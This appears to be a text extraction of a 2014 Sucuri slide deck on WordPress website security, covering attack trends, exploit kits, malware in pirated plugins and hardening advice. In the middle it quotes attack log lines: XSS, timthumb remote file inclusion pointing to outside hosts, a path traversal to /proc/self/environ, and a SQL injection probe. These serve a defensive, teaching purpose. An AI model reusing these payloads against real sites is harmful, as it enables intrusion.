Website Security - Latest and Greatest (WordPress 2014)

 Sucuri, Inc.
 @sucuri_security
 @perezbox
 Specialization:
 Website Security
 Incident Handling
 Special Interests:
 Brazilian JiuJitsu
Tony Perez | @perezbox | @sucuri_security5/17/2014 2

 Website Security Company
 Global Operations
 Platform Agnostic (i.e., Joomla,WordPress, etc..)
 Scan 2M Unique Domains a Month
 Block 4M web attacks a Month
 Remediate 400 – 500 websites a day
 Signature / Heuristic Based
 24/7 operations
5/17/2014 Tony Perez | @perezbox | @sucuri_security 3

 Trends
 Threats
 Defenses

Tony Perez | @perezbox | @sucuri_security5/17/2014 5

Data Breaches (Millions)
2011 2013

Malicious Websites
Legitimate Websites

Not-Exploitable
Exploitable
1 in 8 - CriticalVulnerability

Ransomware
2012 2013

26%
19%
16%
14%
11%
4%
10%
Remote iFrame
Includes
Remote
JavaScript
Includes
SPAM
Injections
Obfuscated /
Encoded
JavaScript
Conditional
Redirects
Defacements Other

Darkleech
Cdork
(Apache)
Ebury
(SSH)
Email
Server
(SPAM)
 Going Deeper than the application layer, targeting the server.
 Server Polymorphism – a.k.a highly adaptive / sophistication
Heartbleed
(OpenSSL)

 Pharmacy
 Payday Loans

 ExploitingAccess Control

Site 1
Site 2Site 3
Site 4
Cross-Site Contamination

 Explosion in the Malware
as a Service (MaaS) trade
 Yes, pay someone to hack
for you
 Different tools to break
in and generate payloads
 Brute force and
vulnerability exploits
Malware Payloads
 Blackhole ExploitAuthor
Arrested

25%
22%
9%
1%
11%
5%
12%
10%
5% Neutrino
Unknown Kit
Redkit
SweetOrange
Styx
Glazunov/Sibhost
Nuclear
Blackhole/Cool
Other

 Use for malware?
 Burrow into network?
 Steal data?
What kind of website do you have?

38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0;
Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E
HTTP/1.1" 404 268
 Stored
 Reflective

[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php
HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0”
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET
/results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-
WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6”
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET
/?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U;
Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us)
Firefox/3.5.9”

 http://blog.sucuri.net/2014/03/unmasking-free-premium-
wordpress-plugins.html
- SEOPresser
- Payload located: wp-content/plugins/seo-pressor(gratuit)
- File: central.class.php
- Flat Skins Pack Extension
- Payload located: wp-content/restrict-content-pro/includes/
- File: sidebar.php
- Restrict Content Pro
- Paylaod located: wp-content/ubermenu-skins-flat

 Brand Reputation
 Legal Implications
 Impact to Sales
 Blacklisted by Search
Engines
 Blacklisted by Payment
processors
 Worst Day Of your Life

 Sucuri properties
suffer:
 ~125,000 web based
attacks a month on
average
 ~4,000 attacks a day
▪ This spikes on occasion
 Doesn’t include server
level attacks
 All flavors of attacks

 Principles
 Access Control
 Vulnerabilities

“It’s about risk reduction… risk will never be
zero…”

“…a concept in which multiple layers of security
controls (defenses) are placed throughout an
information technology (IT) system. Its intent is
to provide redundancy in the event a security
control fails or a vulnerability is exploited…”

 Passwords
Complex – Long - Unique

• https://getclef.com/ | @getclef

“requires that in a particular abstraction layer
of a computing environment, every module
(such as a process, a user or a program
depending on the subject) must be able to
access only the information and resources that
are necessary for its legitimate purpose.”

 PHP Execution, disable it:
 /wp-includes
 /wp-content
 /themes
 /plugins
 /uploads
<Files *.php>
Deny from all
</Files>

 WP-CONFIG File Modification
#Disable Plugin /Theme Editor
Define(‘DISALLOW_FILE_EDIT’,true);

• https://www.getcloak.com/ | @getcloak

NOTTHAT HARD!!!!

 Stay current with the latest vulnerabilities:
 Secure - http://wordpress.org/plugins/secure/

 Local Protection
 https://bruteprotect.com/ | @BruteProtect

• Stay ahead of SoftwareVulnerabilities

1. Employ Website Firewall
2. Don’t let WordPress write to
itself
3. Filter Access by IP
4. Use a dedicated server / VPS
5. Monitor all Activity (Logging)
6. Enable SSL for transactions
7. Keep environment current
(patched)
8. No Soup Kitchen Servers
Ideal implementations:
1. Connect Securely – SFTP /
SSH
2. Authentication Keys / wp-
config
3. Use Trusted Sources
4. Use a local Antivirus – MAC
too
5. Permissions - D 755 | F 644
6. Least Privileged Principles
7. Accountability
8. Backups – Include Database
The Bare Minimum:

1. Fix index.php file and assume all is fine.
1. Panic your way into WordPress Forums after hack.
1. Don’t worry about updating.
1. Trust third-party extensions.
1. Apply all upgrades on live site.
1. Install and forget, all is well with your new site.
1. Use the same username and password for everything.
1. Don’t waste time making security adjustments to PHP and settings.
1. No regular backups required.
1. Use the cheapest host.

Name Tool
Sucuri Blog http://blog.sucuri.net
SucuriTV http://sucuri.tv
Malware Scanner http://sitecheck.sucuri.net
Malware Scanner http://unmaskparasites.com
Badware Busters https://badwarebusters.org
Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-
sites
GoogleWebmasterTools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
Secunia SecurityAdvisories http://secunia.com/community/advisories/search/?search=wordpress
Exploit-DB http://www.exploit-
db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
WordPress Hacked FAQ http://codex.wordpress.org/FAQ_My_site_was_hacked
WordPress Hardening http://codex.wordpress.org/Hardening_WordPress

Sucuri, Inc.
Tony Perez
http://sucuri.net
http://blog.sucuri.net
@perezbox | @sucuri_security
Slides:
http://www.slideshare.net/perezbox/website-security-its-
about-the-basics-wordpress-2014

Website Security - Latest and Greatest (WordPress 2014)

More Related Content

Similar to Website Security - Latest and Greatest (WordPress 2014) (10)

More from Tony Perez (10)

Recently uploaded (20)

Website Security - Latest and Greatest (WordPress 2014)